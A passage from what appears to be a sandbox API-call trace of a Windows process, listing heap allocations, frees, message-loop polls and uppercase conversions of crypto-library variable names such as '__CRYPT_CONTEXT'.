Size=0xc) returned 0x2e50710 [0140.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0140.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0140.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0140.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0140.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0140.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0140.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0140.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0140.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0140.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0140.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0140.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0140.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0140.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0140.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0140.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0140.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0140.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0140.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0140.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0140.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0140.257] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0140.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0140.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0140.257] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0140.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0140.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0140.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0140.257] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0140.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0140.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0140.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0140.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0140.257] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0140.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0140.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0140.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0140.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0140.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0140.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0140.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0140.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0140.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0140.258] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0140.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0140.258] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0140.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0140.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0140.258] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0140.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0140.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0140.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0140.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0140.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0140.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0140.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0140.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0140.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0140.258] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0140.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0140.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0140.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0140.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0140.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0140.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0140.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0140.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0140.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0140.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0140.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0140.260] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0140.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0140.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0140.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0140.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0140.261] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0140.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0140.261] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0140.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0140.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0140.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0140.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0140.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0140.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0140.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0140.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0140.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0140.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0140.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0140.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0140.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0140.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0140.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0140.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0140.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0140.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0140.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0140.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0140.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0140.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0140.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0140.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0140.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0140.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0140.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0140.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0140.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0140.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0140.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0140.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0140.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0140.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0140.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0140.262] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0140.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0140.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0140.263] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0140.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0140.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0140.263] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0140.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0140.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0140.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0140.263] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0140.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0140.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0140.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0140.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0140.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0140.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0140.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0140.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0140.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0140.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0140.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0140.264] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0140.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0140.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0140.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0140.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0140.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0140.264] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0140.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0140.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0140.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0140.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0140.264] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0140.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0140.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0140.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0140.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0140.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0140.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0140.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0140.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0140.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0140.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0140.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0140.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0140.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0140.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0140.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0140.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0140.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0140.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0140.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0140.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0140.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0140.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0140.265] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0140.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0140.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0140.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0140.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0140.265] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0140.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0140.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0140.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0140.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0140.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: 